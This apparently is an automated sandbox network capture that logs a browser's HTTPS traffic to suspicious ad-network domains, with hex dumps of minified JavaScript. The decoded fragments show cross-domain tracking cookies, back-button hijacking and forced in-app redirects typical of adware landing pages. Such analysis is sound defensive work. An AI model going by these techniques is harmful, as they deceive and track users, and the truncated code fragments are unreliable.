                                                                                                          Data Ascii: 1722"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[64683],{64683:function(e,n,o){o.r(n),o.d(n,{default:function(){return C}});var i=o(98788),t=o(22970),c=o(12139),r=o(13923),a=o(71961),s=o(19495),u=o(95798),l=o(9097),f=o(43601),m=
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 3d 21 31 2c 73 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 75 2c 6c 3d 69 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 72 3d 28 75 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 72 3d 21 30 29 7b 76 61 72 20 66 3d 75 2e 76 61 6c 75 65 2c 43 3d 28 30 2c 6d 2e 5a 29 28 66 2e 72 61 6e 67 65 2c 32 29 2c 68 3d 43 5b 30 5d 2c 6b 3d 43 5b 31 5d 3b 69 66 28 63 3e 3d 68 26 26 28 6e 75 6c 6c 3d 3d 3d 6b 7c 7c 63 3c 3d 6b 29 29 72 65 74 75 72 6e 20 66 2e 77 65 69 67 68 74 7d 7d 63 61 74 63 68 28 64 29 7b 61 3d 21 30 2c 73 3d 64 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 72 7c 7c 6e 75 6c 6c 3d 3d 6c 2e 72 65 74 75 72 6e 7c 7c 6c 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 61 29 74 68 72 6f 77 20 73 7d 7d 72 65
                                                                                                          Data Ascii: =!1,s=void 0;try{for(var u,l=i[Symbol.iterator]();!(r=(u=l.next()).done);r=!0){var f=u.value,C=(0,m.Z)(f.range,2),h=C[0],k=C[1];if(c>=h&&(null===k||c<=k))return f.weight}}catch(d){a=!0,s=d}finally{try{r||null==l.return||l.return()}finally{if(a)throw s}}re
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 71 75 65 43 6f 6f 6b 69 65 20 2d 20 43 6f 6f 6b 69 65 20 76 69 65 77 2d 63 6f 75 6e 74 20 76 61 6c 75 65 3a 22 2c 73 29 2c 68 3d 70 61 72 73 65 49 6e 74 28 73 2c 31 30 29 2c 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 68 29 29 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 68 61 6e 64 6c 65 4e 6f 6e 55 6e 69 71 75 65 43 6f 6f 6b 69 65 20 2d 20 43 6f 6f 6b 69 65 20 76 69 65 77 2d 63 6f 75 6e 74 20 76 61 6c 75 65 20 69 73 20 6e 6f 74 20 61 20 6e 75 6d 62 65 72 3a 22 2c 73 29 2c 5b 32 5d 3b 5f 28 68 29 7d 65 6c 73 65 20 6b 3d 28 30 2c 66 2e 4e 29 28 72 2e 42 2e 56 49 45 57 5f 43 4f 55 4e 54 29 2c 28 30 2c 61 2e 63 4d 29 28 22 68 61 6e 64 6c 65 4e 6f 6e 55 6e 69 71 75 65 43 6f 6f 6b 69 65 20 2d 20 55 73 69 6e 67 20 6c 6f 63 61 6c 20 76 69 65 77
                                                                                                          Data Ascii: queCookie - Cookie view-count value:",s),h=parseInt(s,10),Number.isNaN(h))return console.error("handleNonUniqueCookie - Cookie view-count value is not a number:",s),[2];_(h)}else k=(0,f.N)(r.B.VIEW_COUNT),(0,a.cM)("handleNonUniqueCookie - Using local view
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6d 29 7d 29 5d 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 28 43 3d 61 2e 73 65 6e 74 28 29 29 2e 6f 6b 3f 5b 33 2c 34 5d 3a 5b 34 2c 43 2e 74 65 78 74 28 29 5d 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 68 3d 61 2e 73 65 6e 74 28 29 2c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 20 2d 20 46 65 74 63 68 20 66 61 69 6c 65 64 20 77 69 74 68 20 73 74 61 74 75 73 3a 20 22 2e 63 6f 6e 63 61 74 28 43 2e 73 74 61 74 75 73 2c 22 2c 20 6d 65 73 73 61 67 65 3a 20 22 29 2e 63 6f 6e 63 61 74 28 68 29 29 2c 5b 32 2c 6e 75 6c 6c 5d 3b 63 61 73 65 20
                                                                                                          Data Ascii: ntent-Type":"application/json"},body:JSON.stringify(m)})];case 2:return(C=a.sent()).ok?[3,4]:[4,C.text()];case 3:return h=a.sent(),console.error("checkCrossDomainCookie - Fetch failed with status: ".concat(C.status,", message: ").concat(h)),[2,null];case
                                                                                                          2025-01-06 11:09:23 UTC950INData Raw: 6e 43 75 73 74 6f 6d 20 63 6f 6f 6b 69 65 20 6c 69 66 65 74 69 6d 65 20 6e 6f 74 20 73 65 74 22 29 2c 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 44 65 66 61 75 6c 74 20 63 6f 6f 6b 69 65 20 6c 69 66 65 74 69 6d 65 3a 20 22 2e 63 6f 6e 63 61 74 28 65 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 29 29 2c 28 30 2c 73 2e 64 38 29 28 65 2e 6e 61 6d 65 2c 65 2e 76 61 6c 75 65 2c 7b 6d 61 78 41 67 65 3a 65 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 2c 70 61 74 68 3a 22 2f 22 7d 29 7d 65 6c 73 65 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 43 6f 6f 6b 69 65 20 22 2e 63 6f 6e 63 61 74 28 65 2e 6e 61 6d 65 2c 22 20 6e 6f 74 20 65 78 69 73 74 22 29 29 7d 29 29
                                                                                                          Data Ascii: nCustom cookie lifetime not set"),(0,l.cM)("checkCrossDomainCookie\nDefault cookie lifetime: ".concat(e.remainingTtl)),(0,s.d8)(e.name,e.value,{maxAge:e.remainingTtl,path:"/"})}else(0,l.cM)("checkCrossDomainCookie\nCookie ".concat(e.name," not exist"))}))
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          71192.168.2.450118104.18.3.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC502OUTOPTIONS /sync-do HTTP/1.1
                                                                                                          Host: forspearowor.com
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: max-age=0
                                                                                                          Accept: */*
                                                                                                          Access-Control-Request-Method: POST
                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                          Origin: https://wungoangeredsa.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:23 UTC685INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Length: 0
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: https://wungoangeredsa.com
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, baggage, sentry-trace
                                                                                                          Pragma: no-cache
                                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416c5dc8431a-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          72192.168.2.450119188.114.97.34438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC428OUTGET /gid.js?userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1
                                                                                                          Host: my.rtmark.net
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: ID=1zy28050kovbfyyc4yz4gsq62pkmaxhb
                                                                                                          2025-01-06 11:09:23 UTC1309INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Content-Length: 65
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                                          access-control-expose-headers: Authorization
                                                                                                          access-control-allow-credentials: true
                                                                                                          timing-allow-origin: *
                                                                                                          timing-allow-origin: *
                                                                                                          Set-Cookie: ID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; expires=Tue, 06 Jan 2026 11:09:23 GMT; secure; SameSite=None
                                                                                                          strict-transport-security: max-age=1
                                                                                                          x-content-type-options: nosniff
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FadJyEq7fK9DtRjRnnMNwhZCDa6iJFEJ%2BLaia9ZlVn1S8vizxhUkF5yRDG0%2FceYXduO%2FYXegF1DZJVGHSMIEUVSzy3EYa%2BsbUfpPtgUa3YKiMYsZ3VUk3oZo5%2BqNyIP8"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416ce80543c1-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1601&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1006&delivery_rate=1800246&cwnd=223&unsent_bytes=0&cid=45e05c142c8b2b8f&ts=261&x=0"
                                                                                                          2025-01-06 11:09:23 UTC60INData Raw: 7b 22 67 69 64 22 3a 22 31 7a 79 32 38 30 35 30 6b 6f 76 62 66 79 79 63 34 79 7a 34 67 73 71 36 32 70 6b 6d 61 78 68 62 22 2c 22 73 6b 69 70 53 75 62 73 63 72 69 62 65 22 3a 66 61
                                                                                                          Data Ascii: {"gid":"1zy28050kovbfyyc4yz4gsq62pkmaxhb","skipSubscribe":fa
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 6c 73 65 7d 0a
                                                                                                          Data Ascii: lse}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          73192.168.2.450120104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC497OUTGET /_next/static/chunks/dbb80ba394719d25-1736072686539.0157f5525bb5ad80.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-3c86"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416f2aef5e71-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC873INData Raw: 33 63 38 36 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 37 34 32 30 5d 2c 7b 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 31 33 39 29 2c 69 3d 74 28 36 31 36 35 36 29 2c 6f 3d 74 28 38 33 32 31 36 29 2c 61 3d 74 28 37 31 39 36 31 29 2c 73 3d 74 28 33 35 31 34 37 29 2c 75 3d 74 28 32 31 38 31 38 29 2c 63 3d 74 28 35 31 36 35 39 29 2c 6c 3d 74 28 39 34 33 39 37 29 2c 64 3d 74 28 31 39 34 39 35 29 2c 66 3d 5b 22 63 6f 61 6a 75 74 6f 61 2e 63
                                                                                                          Data Ascii: 3c86"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[47420],{50656:function(e,n,t){t.d(n,{N:function(){return v}});var r=t(12139),i=t(61656),o=t(83216),a=t(71961),s=t(35147),u=t(21818),c=t(51659),l=t(94397),d=t(19495),f=["coajutoa.c
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 7b 76 61 72 20 6c 2c 64 2c 76 2c 62 2c 77 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 68 2e 62 61 63 6b 2e 68 69 73 74 6f 72 79 54 69 6d 65 41 6d 6f 75 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 33 2c 79 3d 6e 75 6c 6c 3d 3d 3d 28 72 3d 68 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 3d 3d 3d 75 2e 77 2e 62 61 63 6b 7d 29 29 3b 69 66 28 79 29 76 3d 28 30 2c 63 2e 6b 36 29 28 75 2e 77 2e 62 61 63 6b 29 2c 64 3d 79 3b 65 6c 73 65 20 64 3d 6e 75 6c 6c 3d 3d 3d 28 62 3d 68 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f
                                                                                                          Data Ascii: {var l,d,v,b,w=null!==(l=h.back.historyTimeAmount)&&void 0!==l?l:3,y=null===(r=h.back.zones)||void 0===r?void 0:r.find((function(e){return e.type===u.w.back}));if(y)v=(0,c.k6)(u.w.back),d=y;else d=null===(b=h.back.zones)||void 0===b?void 0:b.find((functio
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 70 75 73 68 20 73 74 61 74 65 2c 20 65 72 72 6f 72 3a 22 2c 69 29 7d 7d 28 22 2f 62 61 63 6b 3f 22 2e 63 6f 6e 63 61 74 28 53 29 2c 77 2c 74 29 7d 65 6c 73 65 28 30 2c 61 2e 79 4e 29 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 22 29 29 3b 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 6e 6f 74 20 66 6f 75 6e 64 22 29 29 7d 7d 7d 7d 7d 2c 34 37 34 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 72 28 6e 29 2c 74 2e 64 28 6e 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 7d 7d 29 3b 76 61 72 20 72 2c 69 3d 74 28 34 37 38 34 32 29 2c 6f 3d 74 28 36 36 33 38 33 29 2c 61 3d 74 28 35
                                                                                                          Data Ascii: push state, error:",i)}}("/back?".concat(S),w,t)}else(0,a.yN)("Zone ".concat(e," is not enabled"));else console.error("Zone ".concat(e," not found"))}}}}},47420:function(e,n,t){t.r(n),t.d(n,{default:function(){return B}});var r,i=t(47842),o=t(66383),a=t(5
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 73 65 2e 64 61 74 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 3b 28 30 2c 73 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 26 26 52 26 26 28 51 26 26 21 55 26 26 28 28 30 2c 64 2e 63 4d 29 28 22 69 6e 41 70 70 3a 20 55 73 65 72 20 64 69 64 20 6e 6f 74 20 67 6f 20 74 6f 20 63 68 72 6f 6d 65 2e 20 52 65 6d 6f 76 69 6e 67 20 6f 76 65 72 6c 61 79 22 29 2c 5a 28 21 31 29 2c 6a 28 21 31 29 29 2c 51 7c 7c 28 28 30 2c 64 2e 63 4d 29 28 22 69 6e 41 70 70 3a 20 55 73 65 72 20 68 61 73 20 67 6f 6e 65 20 74 6f 20 63 68 72 6f 6d 65 2e 20 52 65 73 74 6f 72 69 6e 67 20 6f 76 65 72 6c 61 79 22 29 2c 5a 28 21 30 29 2c 6a 28 21 30 29 29 29 7d 29 2c 5b 52 2c 51 2c 63 2c 55 5d 29 3b 76 61 72 20 6c 65 3d 7b 6d 69 75 69 3a 7b 69 73 45 6e 61
                                                                                                          Data Ascii: se.data.platformVersion;(0,s.useEffect)((function(){c&&R&&(Q&&!U&&((0,d.cM)("inApp: User did not go to chrome. Removing overlay"),Z(!1),j(!1)),Q||((0,d.cM)("inApp: User has gone to chrome. Restoring overlay"),Z(!0),j(!0)))}),[R,Q,c,U]);var le={miui:{isEna
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 73 75 62 64 6f 6d 61 69 6e 3a 20 22 2c 6f 29 2c 58 28 21 30 29 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 28 30 2c 76 2e 64 33 29 28 29 2c 74 3d 28 30 2c 76 2e 71 35 29 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 6e 29 2c 72 3d 22 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2c 22 2f 2f 22 29 2e 63 6f 6e 63 61 74 28 74 29 2e 63 6f 6e 63 61 74 28 4d 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 65 29 3b 72 65 74 75 72 6e 28 30 2c 64 2e 63 4d 29 28 22 5b 49 6e 41 70 70 4f 76 65 72 6c 61 79 5d 3a 20 63 72 65 61 74 65 4c 69 6e 6b 54 6f 4e 65 78 74 4c 61 6e 64 69 6e 67 22 2c 22 72 65 64 69 72 65 63 74 20 73 65 74 54 69 6d 65 6f 75 74 20 74 6f 3a 20
                                                                                                          Data Ascii: subdomain: ",o),X(!0);var a=function(e){var n=(0,v.d3)(),t=(0,v.q5)(window.location.hostname,n),r="".concat(window.location.protocol,"//").concat(t).concat(M,"?").concat(e);return(0,d.cM)("[InAppOverlay]: createLinkToNextLanding","redirect setTimeout to:
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 72 20 6e 3d 62 65 28 29 3b 75 2e 56 38 26 26 21 4b 26 26 28 28 30 2c 64 2e 63 4d 29 28 22 5b 49 6e 41 70 70 4f 76 65 72 6c 61 79 5d 3a 20 68 61 6e 64 6c 65 49 6e 41 70 70 2c 22 2c 22 69 73 52 65 64 69 72 65 63 74 42 79 43 6f 75 6e 74 65 72 73 49 6e 41 70 70 20 74 72 75 65 22 2c 22 72 65 64 69 72 65 63 74 20 74 6f 3a 22 2c 6e 29 2c 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 6e 29 7d 65 6c 73 65 20 69 66 28 52 7c 7c 4b 29 76 65 28 29 3b 65 6c 73 65 7b 76 61 72 20 74 3d 62 65 28 29 3b 75 2e 56 38 26 26 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 74 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 70 65 29 7d 7d 3b
                                                                                                          Data Ascii: r n=be();u.V8&&!K&&((0,d.cM)("[InAppOverlay]: handleInApp,","isRedirectByCountersInApp true","redirect to:",n),document.location.href=n)}else if(R||K)ve();else{var t=be();u.V8&&(document.location.href=t),document.addEventListener("visibilitychange",pe)}};
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 2e 7a 49 6e 64 65 78 3d 22 31 30 30 30 22 2c 6e 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6e 2e 73 74 79 6c 65 2e 6d 61 78 48 65 69 67 68 74 3d 22 33 30 25 22 2c 6e 2e 73 74 79 6c 65 2e 63 6f 6c 6f 72 3d 22 62 6c 61 63 6b 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 29 2c 21 41 72 72 61 79 2e 66 72 6f 6d 28 6e 2e 63 68 69 6c 64 72 65 6e 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 7d 29 29 2e 69 6e 63 6c 75 64 65 73 28 65 29 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 65 2c 6e 2e 61 70 70 65 6e 64 43
                                                                                                          Data Ascii: .zIndex="1000",n.style.overflowY="auto",n.style.maxHeight="30%",n.style.color="black",document.body.appendChild(n)),!Array.from(n.children).map((function(e){return e.textContent})).includes(e)){var t=document.createElement("div");t.textContent=e,n.appendC
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 5b 34 2c 74 2e 65 28 39 30 34 34 38 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 39 30 34 34 38 29 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 6e 3d 72 2e 73 65 6e 74 28 29 2e 42 52 4f 57 53 45 52 53 5f 46 55 4c 4c 2c 65 2e 6c 69 73 74 4f 66 57 65 62 76 69 65 77 42 72 6f 77 73 65 72 73 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 22 77 76 5f 22 29 7d 29 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 75 2e 5a 29 28 28 30 2c 73 2e 5a 29 28 7b 7d 2c 65 29 2c 28 30 2c 61 2e 5a 29 28 7b 7d 2c 74 2c 6e 5b 74 5d 29 29 7d 29 2c 7b
                                                                                                          Data Ascii: el){case 0:return[4,t.e(90448).then(t.bind(t,90448))];case 1:return n=r.sent().BROWSERS_FULL,e.listOfWebviewBrowsers=Object.keys(n).filter((function(e){return e.startsWith("wv_")})).reduce((function(e,t){return(0,u.Z)((0,s.Z)({},e),(0,a.Z)({},t,n[t]))}),{
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 69 73 45 6e 61 62 6c 65 64 26 26 61 2e 70 75 73 68 28 6e 2e 74 79 70 65 29 7d 29 29 2c 74 68 69 73 2e 75 73 65 46 75 6c 6c 4c 69 73 74 4f 66 42 72 6f 77 73 65 72 73 26 26 74 68 69 73 2e 6c 69 73 74 4f 66 57 65 62 76 69 65 77 42 72 6f 77 73 65 72 73 26 26 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 68 69 73 2e 6c 69 73 74 4f 66 57 65 62 76 69 65 77 42 72 6f 77 73 65 72 73 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3d 28 30 2c 63 2e 5a 29 28 65 2c 32 29 5b 31 5d 3b 28 6e 3d 61 29 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 28 30 2c 6c 2e 5a 29 28 74 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 29 29 29 7d 29 29 3b 76 61 72 20 66 3d 6e 65
                                                                                                          Data Ascii: isEnabled&&a.push(n.type)})),this.useFullListOfBrowsers&&this.listOfWebviewBrowsers&&Object.entries(this.listOfWebviewBrowsers).forEach((function(e){var n,t=(0,c.Z)(e,2)[1];(n=a).push.apply(n,(0,l.Z)(t.map((function(e){return e.toString()}))))}));var f=ne
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 6c 65 5f 73 61 66 61 72 69 5f 75 69 5f 77 6b 77 65 62 76 69 65 77 3d 22 6d 6f 62 69 6c 65 5f 73 61 66 61 72 69 5f 75 69 5f 77 6b 77 65 62 76 69 65 77 22 2c 65 2e 71 71 5f 62 72 6f 77 73 65 72 5f 6d 6f 62 69 6c 65 3d 22 71 71 5f 62 72 6f 77 73 65 72 5f 6d 6f 62 69 6c 65 22 7d 28 69 7c 7c 28 69 3d 7b 7d 29 29 7d 2c 32 38 39 33 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 31 33 39 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 28 30 2c 72 2e 75 73 65 53 74 61 74 65 29 28 21 30 29 2c 6e 3d 65 5b 30 5d 2c 74 3d 65 5b 31 5d 3b 72 65 74 75 72 6e 28 30 2c 72 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69
                                                                                                          Data Ascii: le_safari_ui_wkwebview="mobile_safari_ui_wkwebview",e.qq_browser_mobile="qq_browser_mobile"}(i||(i={}))},28939:function(e,n,t){t.d(n,{K:function(){return i}});var r=t(12139),i=function(){var e=(0,r.useState)(!0),n=e[0],t=e[1];return(0,r.useEffect)((functi


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          74192.168.2.450123104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC638OUTGET /_next/static/chunks/1fd69c98394a3b87-1736072686539.8146f5f4d16f0056.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
